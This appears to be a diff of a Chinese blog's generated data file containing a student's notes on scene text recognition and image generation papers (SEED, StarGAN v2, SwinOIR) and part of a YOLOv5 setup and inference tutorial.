    • 传统方法 adopt(采用)a bottom-up approach(方法),先检测和分类字符,然后使用启发式规则(heuristic rules)、语言模型(language models)或词典(lexicons)。整了一堆手工提取的计算成本高(computationally expensive)特征用于 SVM,如纵横比(aspect ratio)、孔面积比(hole area ratio)

    • HOG descriptors(HOG 描述符)

    • Hough voting(Hough 投票机制)


    • treats(视作)

    • character alignment(字符调整)

    • contextual dependencies(上下文相关性)

    • attention drift(注意力漂移)


    ​ 上述方法都假定(assume)文本是水平(horizontal)的,带透视扭曲和曲线就寄。提出了 STN 解决这个问题,还可以用迭代矫正(iterative rectification)和几何约束(geometric constraints)矫正(rectifies),矫正(rectifying)

    • in spite of(尽管)

    • auxiliary dense character(辅助稠密特征)

    • tailored(特制的)

    2.2 Semantics in Scene Text

    • contextualized lexicons(语境化词典)

    • word spotting system(单词识别系统)

    • boost(促进)

    • utilize(应用)

    • integrate(合并)

    • explicitly(准确地)

    3 Method

    3.1 Encoder-Decoder Framework

    • simplicity(简单地)

    • fixed(固定)

    • drawback(缺点)

    • inspired(启发)

    • shortcuts(捷径)

    • capable(能干的)

    3.2 FastText Model

    ​ 设 $T={w_{i-l},…,w_{i+l}}$ 是文本语料库中的一个句子。

    • $l$ 是句子的长度,是一个超参数

    • 单词 $w_i$ 由嵌入向量 $v_i$ 表示,然后输入到简单的前馈神经网络(simple feed-forward neural network)

    • 目的是预测表示为 $C_i=w_{i−l},…,w_{i−1},w_{i+1},…,w_{i + l}$。通过前馈网络的训练,同时对嵌入向量进行优化,最终得到的单词嵌入向量与语义相近的单词接近

    • FastText 还嵌入了子单词(subwords),使用它们生成单词 $w_i$ 的最终嵌入。

    3.3 SEED

    3.3.1 General Framework

    • scenarios(情景)

    • address these problems(解决这些问题)

    • utilizing(使用)

    • alternative(可替代的)

    • fed into(馈送)

    3.3.2 Architecture of Semantics Enhanced ASTER

    • exemplar(模板)

    • transcribes(转录)

    • thin-plate splines(薄板样条)

    • rectified image(矫正图像)

    ​ 编码器的输出是形状为 $L\times C$ 的特征序列 $h=(h_1,…h_L)$,$L$ 是 CNN 中最后一个特征图的宽度,$C$ 是深度。

    ​ 特征序列 $h$ 有两个功能:

    • 通过语义模块预测语义信息

    • 作为 D 的输入

    • 将特征序列平坦化为一维向量 $I$,维数为 $K$,$K=L\times C$,语义信息 $S$ 通过两个线性函数预测 $S=W_2\sigma(W_1I+b_1)+b_2$

    • In particular, the semantic information S is used to initialize the states of GRU after a linear function for transforming the dimension.

      • 特别地,使用语义信息 $S$ 对 GRU 的状态进行初始化,并对维度进行线性函数变换。
    • Instead of using zero-state initializing, the decoding process will be guided with global semantics, so the decoder uses not only local visual information but also global semantic information to generate more accurate results.

      • 解码过程将以全局语义为指导,而不是使用零状态初始化,因此解码器不仅使用局部视觉信息,还使用全局语义信息来生成更准确的结果。

    3.4Loss Function and Training Strategy

    $$L=L_{rec}+\lambda L_{sem}$$

    • $L_{rec}$ 是预测概率相对于 GT 的 standard cross-entropy
    • $L_{sem}$ 是预测的语义信息和从预训练 FastText 模型中转录标签词嵌入和预测语义信息的余弦嵌入损失.

    • two training strategie(策略)
      • 用预训练的 FastText 模型中的词嵌入而不是预测的语义信息初始化 D
      • 直接预测语义信息

    4 Experiments

    4.1 Datasets

    • implementation details(实现细节)

    • benchmarks(基准)

    • cropped(裁切不正的)

    • careful capture(小心捕捉)

    • resolution(分辨率)

    • synthetic(合成)

    • It contains words from the testing set of the IC13 and SVT. 它包含来自 IC13 和 SVT 测试集的单词

    4.2 Implementation Details

    • officially(正式地)

    • symbols(符号)

    • 采用 ADADELTA 最小化目标函数

    • 文本生成任务中常用的解码策略Beam Search(集束搜索)

    • accumulative scores(累积计分)

    4.3 Ablation Study

    • separately(分开)

    • consistently(一贯地)

    • predicted holistic features(预测整体特征)

    • implicit weakly supervised(隐式弱监督)

    4.4 Performance with Inaccurate Bounding Boxes

    • real applications(真正的应用程序)

    • If text recognition is robust to inaccurate detection results, the overall end-to-end performance can be more satisfactory

      • 如果文本识别对不准确的检测结果具有鲁棒性,则整体端到端性能可以更令人满意
    • receptive field(接受域)

    • conduct experiments(进行实验)

    • situation(情况)

    • exemplar(样本)

    • shrink datasets(小数据集)

    • simultaneously(同时地)

    • intersection over union(交集/并集)

    4.5 Generalization of Proposed Framework

    • generalization(泛化性)

    • ntegrate another state-of-the-art recognition method SAR

      • 集成了另一种 SOTA:SAR

    4.6 Qualitative Results and Visualization

    • occlusion(遮挡)

    代码

    Pay20Y/SEED (github.com) 下载代码到系统上,把 requirement.txt 里关于 torch 的删了。

    png

    装!

    1
    pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

    中间会因为装 pycocotools 失败而寄,填之:

    1
    sudo apt-get install gcc build-essential

    继续,然后装 scipy 会寄,从 requirement.txt 里删了它重新装直到没有报错。


    Word vectors for 157 languages · fastText 里下载下载预训练语言模型 cc.en.300.bin

    ]]>
    @@ -7351,7 +7351,7 @@ /posts/Paper-%E7%AC%AC%206%20%E5%91%A8%E5%92%8C%E7%AC%AC%207%20%E5%91%A8%E4%B9%9F%E6%98%AF%E8%A2%AB%E8%A6%81%E6%B1%82%E7%9C%8B%E8%AE%BA%E6%96%87%E7%84%B6%E5%90%8E%E7%9C%8B%E4%B8%8D%E6%87%82%E7%9A%84%E4%B8%A4%E5%91%A8/ - 前言

    ​ 又过了两周,看了几篇论文,感觉总结得太晚有几篇已经忘了看了个什么玩意儿了😅。

    ​ 还是感觉代码很重要啊!服务器也搭了,pytorch 也入门了,真的该开始代码复现了。感觉泛读多篇论文,不如精读一篇?李宏毅的代码作业我觉得也该尝试一下了!不过这个学习思路跟导师说的泛读论文有点相悖就是了。

    ​ 不知道上次反 push 导师是个什么效果,反正现在组会是越来越长了,希望我的同门们不要怪罪我😅。上周组会开始导师叫凡哥讲了他的 Electronics 小论文大概是怎么水的,下周组会又是挑出一篇论文在组里讨论,那就继续读读读吧。

    ​ 这篇博客是总结这两周看的论文,其实我很早就有一点想法了,只是不知道这个想法好不好使。过段时间要不总结一下再反 push 一下导师,说说自己最近的想法和学习情况吧。

    ​ 对了,由于我博客发的有点多,感觉我的博客文章有点散乱了,是时候找个时间好好整理一番了,对了电脑硬盘快爆了也该整了。

    ​ 念英语啊,下次一定呜呜呜😭。

    ​ 快点水完论文想学前端 UE 操作系统呜呜呜😭。

    ​ 学期快过半了,暑假放我回家在师大好好学习吧呜呜呜😭。

    正文

    自己瞎看的

    Few-shot Font Generation with Weakly Supervised Localized Representations

    资源

    原文:

    代码:

    内容

    ​ giao,太早以前看的,看笔记都快回忆不出来了,如果是在感兴趣的话,该重看一遍了。

    • 为了搞定汉字的字体风格迁移,设计了一种新的字体生成方法,学习本地化样式,基于组件的样式表示,而不是通用样式。

    • 字体生成,就是从极少的参考字形中提取复杂的局部特征:局部笔画、衬线、子字符的大小。汉字的组成部分太多了哟,难顶。

    png

    ​ 工作就是为汉字系统的所有 19514 字符设计了 371 个组件来表示它们。

    png

    设计的模型叫做 LF-Font 分成多个部件:

    • Content Encoding 内容编码 $E_c$ 从输入 $x_{s_0,c}$ 中提取出内容表示 $f_c$
    • Style Encoding 风格编码器 $E_{s,u}$ 提取风格
    • Generation 生成器 $G$ 从 $f_c$ 和 $f_s$ 合成目标字形 $\tilde{x}_{\tilde{s},c}$
    • 训练共享模块

    ​ 回忆不出来了 orz,生成模型的评价指标似乎还是主观的。

    The SYNTHIA Dataset: A Large Collection of Synthetic Images for Semantic Segmentation of Urban Scenes

    资源

    IEEE

    原文

    官网

    内容

    ​ 其实跟想研究的方法无关 orz,但是是以 Unity 生成的城市场景语义分割的数据集,爷青回。用于给自动驾驶训练。

    ​ 这个有点想自己跑一遍。SYNTHIA 带有生成的类注释,将 SYNTHIA 与公开可用的城市图像结合使用。

    ​ 包含 13 个像素级语义级注释:天空、建筑物、道路、人行道、围栏、植被、车道标记、栏杆、汽车、交通标志、行人、自行车。可以自由调整这些类的属性等。

    ​ 213400 张合成图像,快照和视频序列。从多个视角模拟不同的季节、天气和照明生成图像。

    Towards End-to-End Unified Scene Text Detection and Layout Analysis

    资源

    原文:

    代码:

    内容

    ​ 这个当时居然写了蛮详细的笔记,好吧。

    • 提出了一个新的模型 Unified Detector,试图将场景文本检测文档布局分析结合起来。引入了一个新的分层场景数据集——HierText:第一个具有自然场景和文档中文本分层注释的数据集,拥有高质量的单词、行、段落级注释。
      • 就是把文档中的布局分析框定为检测和分割任务
      • 将布局分析引入场景文本域。

    png

    • 架构:

      • Backbone:The MaX-DeepLab,沙漏风格的 CNN 交替堆叠和提出的 dual-path transformer CNN 从粗分辨率到精细分辨率迭代编码特征,从而可以产生高分辨率的特征。
      • Text detection branch
      • Layout branch
      • Textness branch:两个全连接层,1 个 sigmoid 函数,生成二进制分类函数 ${\hat y_i}^N_{i=1}$
    • 使用最近提出的 $PQ$ 指标作为主要评估指标:$PQ=\frac{\sum_{(p,g)\in TP}IOU(p,g)}{|TP|+\frac{1}{2}|FP|+\frac{1}{2}|FN|}$

    • 损失函数:$\mathcal{L}=\lambda_1\mathcal{L}{det}+\lambda_2\mathcal{L}{lay}+\lambda_3\mathcal{L}{seg}+\lambda_4\mathcal L{ins}$

      • $\mathcal L_{det}$:Text detection loss
      • $\mathcal L_{lay}$:Layout analysis loss
      • $\mathcal L_{seg}$:Instance discrimination loss
      • $\mathcal L_{ins}$:由 MaX-DeepLab 产生

    感觉比较牛逼就读的仔细一些的

    ​ 这些都发了独立的推文,也列出来吧。

    Paper-Text Recognition in the Wild-A Survey

    见:[Paper-Text Recognition in the Wild-A Survey-Zi-Zi’s Journey](…/…/…/…/2023/03/26/Paper-Text Recognition in the Wild-A Survey/)

    导师要求看的

    SEED-Semantics Enhanced Encoder-Decoder Framework for Scene Text Recognition

    资源

    原文:

    代码:

    内容

    • 目前都是用 E-D 的结构处理场景文本检测中视角失真、曲线形状的难题,但对图像模糊、光照不均、字符不完整不太好使。
    • 其他人都是使用局部视觉特征,没有显式的全局语义信息。我们提出了语义增强 E-D 集成了最先进的 ASTER。
    • 将文本识别视为一个跨模态任务。从预训练的语言模型中获取单词嵌入,就是把 NLP 引入其中啦。
    • 现有的深度学习方法:CTC、Attention,而对于不规则的文本识别:STN、Attention。
    • 利用语义:CNN、语言模型、预训练的语言模型,使用基于 skip-gram 的 FastText 作为预训练的语言模型。

    png

    png

    StarGAN v2-Diverse Image Synthesis for Multiple Domains

    资源

    内容

    StarGAN v2:多域的不同图像合成

    png

    • 提出了一个新的 image-to-image 模型:StarGAN v2,保证生成图像的多样性(diversity)和跨多个域的可伸缩性(scalability)(将一个域的图像转换为目标域的多个图像,并支持多个目标域)。
    • 提出了一个新的动物面部数据集 AFHQ

    png

    StarGAN 给定一个图像 $x\in \mathcal X$ 和 任意域 $y\in \mathcal Y$,训练一个生成器 $G$,生成 $y$ 对应于 $x$ 的不同图像。由 4 个模块组成:

    • 生成器 $G$ 生成图像,接受输入 $x$ 和 $F,E$ 给的 $s$,输出 $G(x,s)$,使用自适应实例规范化(AdaIN)将 $s$ 注入到 $G$ 中
    • 映射网络 $F$(Mapping network)将潜在代码(Latent code)$z$,给定一个区域 $y$,生成为多个域的样式代码 $s=F_y(z)$,由多个输出分支的 MLP 组成
    • 风格编码器 $E$(Style Encoder)给定图像 $x$ 和其对应的域 $y$,提取图像的风格代码 $s=E_y(x)$,给 $G$ 用
    • 鉴别器 $D$ 鉴别图像,就是个二值分类

    训练目标

    • Adversarial objective 对抗目标

      • 随机抽取 Latent code $z\in \mathcal Z$ 和 目标域 $\tilde y\in \mathcal Y$ 生成目标样式代码 $\tilde s=F_{\tilde y}(z)$,生成器 $G$ 以图像 $x$ 和 $\tilde s$ 作为输入,生成 $G(x,\tilde s)$
        • 损失函数 $\mathcal L_{adv}=\mathbb{E}{x,y}[\log D_y(x)]+\mathbb{E}{x,\tilde y,z}[\log(1-D_{\tilde y}(G(x,\tilde s)))]$
    • Style reconstruction 风格构建

      • 强制生成器 $G$ 在生成图像 $G(x,\tilde s)$ 时使用 style code $\tilde s$,使用了一个样式重建损失
        • $\mathcal L_{sty}=\mathbb E_{x,\tilde y,z}[||\tilde s-E_{\tilde y}(G(x,\tilde s))||_1]$
    • Style diversification 风格多样化

      • $\mathcal L_{ds}=\mathbb E_{x,\tilde y,z_1,z_2}[||G(x,\tilde s_10-G(x,\tilde s_2))||_1]$
    • Preserving source characteristics 保持原特性

      • $\mathcal L_{cyc}=\mathbb{E}_{x,y,\tilde y,z}[||x-G(G(x,\tilde s), \tilde s)||_1]$
    • 综合:$\min_{G,F,E}\max_D\ \mathcal L_{adv}+\lambda_{sty}\mathcal L_{sty}-\lambda_{ds}\mathcal L_{ds}+\lambda_{cyc}\mathcal L_{cyc}$


    实验

    • Baselines:MUNIT、DRIT、MSGAN

    • Datasets: CelebA-HQ、StarGAN v2

    • Evaluation metrics: FID、LPIPS

    A Framework for Real-time Object Detection and Image Restoration

    资源

    内容

    ​ 既整目标检测,又整超分辨率/图像修复

    • 整了一个目标检测图像修复的两阶段框架
      • 第一阶段:YOLO,然后进行图像裁剪
      • 第二阶段:改进 Swin Transformer,命名为 SwinOIR
    • 对于目标检测
      • 单阶段:直接生成目标的类概率和位置,SSD、RetinaNet、CornerNet、YOLO
      • 多阶段:RCNN、Fast R-CNN,先提供多个区域建议,再在这些建议上获得类别。

    直接把 YOLO 历史搬出来了可还行。

    在图像超分辨率任务上实现 Transformer。

    我们这个框架,先目标检测图像修复,超分辨率的架构分成三个模块:

    • Pre-Feature Extraction
      • 提取特征?就是卷积一阵卷,预特征提取 $F_{pre}=H_{pre}(I_O)$
    • Main Feature Extraction
      • 主特征提取 $F_{main}=H_{main}(F_{pre})$
      • $Q=XP_Q,K=XP_K,V=XP_V,\mathrm{Attention}(Q,K,V)=\mathrm{Softmax}(QK^T/\sqrt{d}+B)V$
    • High Quality Image Reconstruction
      • 接受之前重建的特征,重建高质量的物体图像 $I_{HQO}=H_{IR}(F_{pre}+F_{main})$

    ​ 优化目标:$\mathcal L=||I_{HQO}-I_{HQ}||_1$


    实验

    • Dataset:MS COCO dataset、Pascal VOC dataset、SR testing datasets、DIV2K dataset、 BSDS300、PIRM dataset
    • Evaluation Metric:mAP、PSNR、SSIM

    YOLO9000-Better, Faster, Stronger

    VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations

    见:[Paper-VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations-Zi-Zi’s Journey](…/…/…/…/2023/04/05/Paper-VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations/)

    想看的

    ]]>
    + 前言

    ​ 又过了两周,看了几篇论文,感觉总结得太晚有几篇已经忘了看了个什么玩意儿了😅。

    ​ 还是感觉代码很重要啊!服务器也搭了,pytorch 也入门了,真的该开始代码复现了。感觉泛读多篇论文,不如精读一篇?李宏毅的代码作业我觉得也该尝试一下了!不过这个学习思路跟导师说的泛读论文有点相悖就是了。

    ​ 不知道上次反 push 导师是个什么效果,反正现在组会是越来越长了,希望我的同门们不要怪罪我😅。上周组会开始导师叫凡哥讲了他的 Electronics 小论文大概是怎么水的,下周组会又是挑出一篇论文在组里讨论,那就继续读读读吧。

    ​ 这篇博客是总结这两周看的论文,其实我很早就有一点想法了,只是不知道这个想法好不好使。过段时间要不总结一下再反 push 一下导师,说说自己最近的想法和学习情况吧。

    ​ 对了,由于我博客发的有点多,感觉我的博客文章有点散乱了,是时候找个时间好好整理一番了,对了电脑硬盘快爆了也该整了。

    ​ 念英语啊,下次一定呜呜呜😭。

    ​ 快点水完论文想学前端 UE 操作系统呜呜呜😭。

    ​ 学期快过半了,暑假放我回家在师大好好学习吧呜呜呜😭。

    正文

    自己瞎看的

    Few-shot Font Generation with Weakly Supervised Localized Representations

    资源

    原文:

    代码:

    内容

    ​ giao,太早以前看的,看笔记都快回忆不出来了,如果是在感兴趣的话,该重看一遍了。

    • 为了搞定汉字的字体风格迁移,设计了一种新的字体生成方法,学习本地化样式,基于组件的样式表示,而不是通用样式。

    • 字体生成,就是从极少的参考字形中提取复杂的局部特征:局部笔画、衬线、子字符的大小。汉字的组成部分太多了哟,难顶。

    png

    ​ 工作就是为汉字系统的所有 19514 字符设计了 371 个组件来表示它们。

    png

    设计的模型叫做 LF-Font 分成多个部件:

    • Content Encoding 内容编码 $E_c$ 从输入 $x_{s_0,c}$ 中提取出内容表示 $f_c$
    • Style Encoding 风格编码器 $E_{s,u}$ 提取风格
    • Generation 生成器 $G$ 从 $f_c$ 和 $f_s$ 合成目标字形 $\tilde{x}_{\tilde{s},c}$
    • 训练共享模块

    ​ 回忆不出来了 orz,生成模型的评价指标似乎还是主观的。

    The SYNTHIA Dataset: A Large Collection of Synthetic Images for Semantic Segmentation of Urban Scenes

    资源

    IEEE

    原文

    官网

    内容

    ​ 其实跟想研究的方法无关 orz,但是是以 Unity 生成的城市场景语义分割的数据集,爷青回。用于给自动驾驶训练。

    ​ 这个有点想自己跑一遍。SYNTHIA 带有生成的类注释,将 SYNTHIA 与公开可用的城市图像结合使用。

    ​ 包含 13 个像素级语义级注释:天空、建筑物、道路、人行道、围栏、植被、车道标记、栏杆、汽车、交通标志、行人、自行车。可以自由调整这些类的属性等。

    ​ 213400 张合成图像,快照和视频序列。从多个视角模拟不同的季节、天气和照明生成图像。

    Towards End-to-End Unified Scene Text Detection and Layout Analysis

    资源

    原文:

    代码:

    内容

    ​ 这个当时居然写了蛮详细的笔记,好吧。

    • 提出了一个新的模型 Unified Detector,试图将场景文本检测文档布局分析结合起来。引入了一个新的分层场景数据集——HierText:第一个具有自然场景和文档中文本分层注释的数据集,拥有高质量的单词、行、段落级注释。
      • 就是把文档中的布局分析框定为检测和分割任务
      • 将布局分析引入场景文本域。

    png

    • 架构:

      • Backbone:The MaX-DeepLab,沙漏风格的 CNN 交替堆叠和提出的 dual-path transformer CNN 从粗分辨率到精细分辨率迭代编码特征,从而可以产生高分辨率的特征。
      • Text detection branch
      • Layout branch
      • Textness branch:两个全连接层,1 个 sigmoid 函数,生成二进制分类函数 ${\hat y_i}^N_{i=1}$
    • 使用最近提出的 $PQ$ 指标作为主要评估指标:$PQ=\frac{\sum_{(p,g)\in TP}IOU(p,g)}{|TP|+\frac{1}{2}|FP|+\frac{1}{2}|FN|}$

    • 损失函数:$\mathcal{L}=\lambda_1\mathcal{L}{det}+\lambda_2\mathcal{L}{lay}+\lambda_3\mathcal{L}{seg}+\lambda_4\mathcal L{ins}$

      • $\mathcal L_{det}$:Text detection loss
      • $\mathcal L_{lay}$:Layout analysis loss
      • $\mathcal L_{seg}$:Instance discrimination loss
      • $\mathcal L_{ins}$:由 MaX-DeepLab 产生

    感觉比较牛逼就读的仔细一些的

    ​ 这些都发了独立的推文,也列出来吧。

    Paper-Text Recognition in the Wild-A Survey

    见:[Paper-Text Recognition in the Wild-A Survey-Zi-Zi’s Journey](…//Paper-Text Recognition in the Wild-A Survey/)

    导师要求看的

    SEED-Semantics Enhanced Encoder-Decoder Framework for Scene Text Recognition

    资源

    原文:

    代码:

    内容

    • 目前都是用 E-D 的结构处理场景文本检测中视角失真、曲线形状的难题,但对图像模糊、光照不均、字符不完整不太好使。
    • 其他人都是使用局部视觉特征,没有显式的全局语义信息。我们提出了语义增强 E-D 集成了最先进的 ASTER。
    • 将文本识别视为一个跨模态任务。从预训练的语言模型中获取单词嵌入,就是把 NLP 引入其中啦。
    • 现有的深度学习方法:CTC、Attention,而对于不规则的文本识别:STN、Attention。
    • 利用语义:CNN、语言模型、预训练的语言模型,使用基于 skip-gram 的 FastText 作为预训练的语言模型。

    png

    png

    StarGAN v2-Diverse Image Synthesis for Multiple Domains

    资源

    内容

    StarGAN v2:多域的不同图像合成

    png

    • 提出了一个新的 image-to-image 模型:StarGAN v2,保证生成图像的多样性(diversity)和跨多个域的可伸缩性(scalability)(将一个域的图像转换为目标域的多个图像,并支持多个目标域)。
    • 提出了一个新的动物面部数据集 AFHQ

    png

    StarGAN 给定一个图像 $x\in \mathcal X$ 和 任意域 $y\in \mathcal Y$,训练一个生成器 $G$,生成 $y$ 对应于 $x$ 的不同图像。由 4 个模块组成:

    • 生成器 $G$ 生成图像,接受输入 $x$ 和 $F,E$ 给的 $s$,输出 $G(x,s)$,使用自适应实例规范化(AdaIN)将 $s$ 注入到 $G$ 中
    • 映射网络 $F$(Mapping network)将潜在代码(Latent code)$z$,给定一个区域 $y$,生成为多个域的样式代码 $s=F_y(z)$,由多个输出分支的 MLP 组成
    • 风格编码器 $E$(Style Encoder)给定图像 $x$ 和其对应的域 $y$,提取图像的风格代码 $s=E_y(x)$,给 $G$ 用
    • 鉴别器 $D$ 鉴别图像,就是个二值分类

    训练目标

    • Adversarial objective 对抗目标

      • 随机抽取 Latent code $z\in \mathcal Z$ 和 目标域 $\tilde y\in \mathcal Y$ 生成目标样式代码 $\tilde s=F_{\tilde y}(z)$,生成器 $G$ 以图像 $x$ 和 $\tilde s$ 作为输入,生成 $G(x,\tilde s)$
        • 损失函数 $\mathcal L_{adv}=\mathbb{E}{x,y}[\log D_y(x)]+\mathbb{E}{x,\tilde y,z}[\log(1-D_{\tilde y}(G(x,\tilde s)))]$
    • Style reconstruction 风格构建

      • 强制生成器 $G$ 在生成图像 $G(x,\tilde s)$ 时使用 style code $\tilde s$,使用了一个样式重建损失
        • $\mathcal L_{sty}=\mathbb E_{x,\tilde y,z}[||\tilde s-E_{\tilde y}(G(x,\tilde s))||_1]$
    • Style diversification 风格多样化

      • $\mathcal L_{ds}=\mathbb E_{x,\tilde y,z_1,z_2}[||G(x,\tilde s_10-G(x,\tilde s_2))||_1]$
    • Preserving source characteristics 保持原特性

      • $\mathcal L_{cyc}=\mathbb{E}_{x,y,\tilde y,z}[||x-G(G(x,\tilde s), \tilde s)||_1]$
    • 综合:$\min_{G,F,E}\max_D\ \mathcal L_{adv}+\lambda_{sty}\mathcal L_{sty}-\lambda_{ds}\mathcal L_{ds}+\lambda_{cyc}\mathcal L_{cyc}$


    实验

    • Baselines:MUNIT、DRIT、MSGAN

    • Datasets: CelebA-HQ、StarGAN v2

    • Evaluation metrics: FID、LPIPS

    A Framework for Real-time Object Detection and Image Restoration

    资源

    内容

    ​ 既整目标检测,又整超分辨率/图像修复

    • 整了一个目标检测图像修复的两阶段框架
      • 第一阶段:YOLO,然后进行图像裁剪
      • 第二阶段:改进 Swin Transformer,命名为 SwinOIR
    • 对于目标检测
      • 单阶段:直接生成目标的类概率和位置,SSD、RetinaNet、CornerNet、YOLO
      • 多阶段:RCNN、Fast R-CNN,先提供多个区域建议,再在这些建议上获得类别。

    直接把 YOLO 历史搬出来了可还行。

    在图像超分辨率任务上实现 Transformer。

    我们这个框架,先目标检测图像修复,超分辨率的架构分成三个模块:

    • Pre-Feature Extraction
      • 提取特征?就是卷积一阵卷,预特征提取 $F_{pre}=H_{pre}(I_O)$
    • Main Feature Extraction
      • 主特征提取 $F_{main}=H_{main}(F_{pre})$
      • $Q=XP_Q,K=XP_K,V=XP_V,\mathrm{Attention}(Q,K,V)=\mathrm{Softmax}(QK^T/\sqrt{d}+B)V$
    • High Quality Image Reconstruction
      • 接受之前重建的特征,重建高质量的物体图像 $I_{HQO}=H_{IR}(F_{pre}+F_{main})$

    ​ 优化目标:$\mathcal L=||I_{HQO}-I_{HQ}||_1$


    实验

    • Dataset:MS COCO dataset、Pascal VOC dataset、SR testing datasets、DIV2K dataset、 BSDS300、PIRM dataset
    • Evaluation Metric:mAP、PSNR、SSIM

    YOLO9000-Better, Faster, Stronger

    VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations

    见:[Paper-VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations-Zi-Zi’s Journey](…//Paper-VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations/)

    想看的

    ]]>
    @@ -7376,7 +7376,7 @@ /posts/Diary-%E8%BF%99%E6%98%AF%E7%AC%AC%206%20%E5%91%A8%E5%92%8C%E7%AC%AC%207%20%E5%91%A8%E7%9A%84%E6%97%A5%E5%B8%B8%EF%BC%81/ -
    ]]>
    +
    ]]>
    @@ -7459,7 +7459,7 @@ /posts/Pytorch-%E7%9B%AE%E6%A0%87%E6%A3%80%E6%B5%8B%20YOLOv5%20%E5%BC%80%E6%BA%90%E4%BB%A3%E7%A0%81%E9%A1%B9%E7%9B%AE%E8%B0%83%E8%AF%95%E4%B8%8E%E8%AE%B2%E8%A7%A3%E5%AE%9E%E6%88%98-%E5%B0%8F%E5%9C%9F%E5%A0%86/ - 视频

    仓库

    课程

    课程介绍

    1. 项目介绍及环境配置
    2. 如何利用 YOLOv5 进行预测
    3. 如何训练 YOLOv5 神经网络
    4. 如何制作和训练自己的数据集
    5. 理解预测代码组织和结构
    6. 理解训练代码组织和结构
    7. 带你重写代码(有机会的话)

    项目介绍及环境配置

    从 github 官网上爬取项目。

    为了保证与讲解视频一致,选择 v5.0 版本(是 yolov5 的 5.0 版本,不是 yolo 的 5.0 版本),下载代码时选择 Download ZIP

    查看 README.md

    Python 3.8 or later with all requirements.txt dependencies installed, including torch>=1.7. To install run:

    $ pip install -r requirements.txt

    使用 Pycharm 打开项目,配环境:

    conda create -n yolo python=3.9
    conda activate yolo
    pip install -r requirements.txt

    1. 选择特定 Tags 的文件,以保持和视频中代码的一致
    2. 在 PyCharm 中配置对应的 Conda 环境
    3. 如果作者提供 requirments.txt 文件:
      • 可以利用 PyCharm 自带的智能提示进行安装
      • 或者利用 pip install-r requirements.txt 指令进行安装
    4. 如果作者没有提供 requirments.txt 文件
      • 根据运行报错信息,百度,手动安装缺少的库

    如何利用 YOLOv5 进行预测(一)

    ​ 在 README.md 中可以看到如何导入训练好的模型文件对图像进行预测:

    detect.py runs inference on a variety of sources, downloading models automatically from the latest YOLOv5 release and saving results to runs/detect.

    $ python detect.py --source 0  # webcam
    file.jpg # image
    file.mp4 # video
    path/ # directory
    path/*.jpg # glob
    'https://youtu.be/NUsoVlDFqZg' # YouTube video
    'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP stream

    ​ 官方文档推荐用命令行设置相应的 parser 参数开始预测,但是也可以使用 pycharm 启动。

    ​ 打开 detect.py:

    if __name__ == '__main__': 中会有包 import argparse 中的 parser 参数,通过命令行运行这个文件可以设置这些参数:

    if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
    parser.add_argument('--source', type=str, default='data/images', help='source') # file/folder, 0 for webcam
    parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
    parser.add_argument('--conf-thres', type=float, default=0.25, help='object confidence threshold')
    parser.add_argument('--iou-thres', type=float, default=0.45, help='IOU threshold for NMS')
    parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
    parser.add_argument('--view-img', action='store_true', help='display results')
    parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
    parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
    parser.add_argument('--nosave', action='store_true', help='do not save images/videos')
    parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --class 0, or --class 0 2 3')
    parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')
    parser.add_argument('--augment', action='store_true', help='augmented inference')
    parser.add_argument('--update', action='store_true', help='update all models')
    parser.add_argument('--project', default='runs/detect', help='save results to project/name')
    parser.add_argument('--name', default='exp', help='save results to project/name')
    parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
    opt = parser.parse_args()
    print(opt)
    check_requirements(exclude=('pycocotools', 'thop'))

    with torch.no_grad():
    if opt.update: # update all models (to fix SourceChangeWarning)
    for opt.weights in ['yolov5s.pt', 'yolov5m.pt', 'yolov5l.pt', 'yolov5x.pt']:
    detect()
    strip_optimizer(opt.weights)
    else:
    detect()

    ​ 运行后会根据 --weights 的默认值 yolov5s.pt 下载模型文件:https://github.com/ultralytics/yoloy5/releases/download/y5.0/yolov5s.pt,也可以换其他的模型:`yolov5m.pt`、`yolov5l.pt`、`yolov5x.pt`。

    png

    ​ 然后根据 --source 的默认值 data/images 读取输入。

    ​ 生成的 --project 的默认值 runs/detect 将预测后的结果保存至相应的文件夹。

    Namespace(weights='yolov5s.pt', source='data/images', img_size=640, conf_thres=0.25, iou_thres=0.45, device='', view_img=False, save_txt=False, save_conf=False, nosave=False, classes=None, agnostic_nms=False, augment=False, update=False, project='runs/detect', name='exp', exist_ok=False)
    YOLOv5 2021-4-12 torch 2.0.0+cpu CPU

    Fusing layers...
    C:\Users\gzjzx\anaconda3\envs\yolo\lib\site-packages\torch\functional.py:504: UserWarning: torch.meshgrid: in an upcoming release, it will be required to pass the indexing argument. (Triggered internally at C:\actions-runner\_work\pytorch\pytorch\builder\windows\pytorch\aten\src\ATen\native\TensorShape.cpp:3484.)
    return _VF.meshgrid(tensors, **kwargs) # type: ignore[attr-defined]
    Model Summary: 224 layers, 7266973 parameters, 0 gradients, 17.0 GFLOPS
    image 1/2 D:\Study\1st-year-master\yolov5-5.0\data\images\bus.jpg: 640x480 4 persons, 1 bus, 1 fire hydrant, Done. (1.685s)
    image 2/2 D:\Study\1st-year-master\yolov5-5.0\data\images\zidane.jpg: 384x640 2 persons, 2 ties, Done. (0.973s)
    Results saved to runs\detect\exp14
    Done. (3.025s)

    jpg

    坑点:

    如何利用 YOLOv5 进行预测(二)

    ​ 这章主要讲了剩下的参数的用法。

    ​ 可以在 pycharm 中的 Edit Configurations...Parameters 中设置参数。

    png

    • --img-size 在导入图片时,会把图片缩放至一定大小的图片作为输入。

    • --conf-thres 置信阈值,只有检测结果大于该阈值的才会在输出中展示。

    • --iou-thres

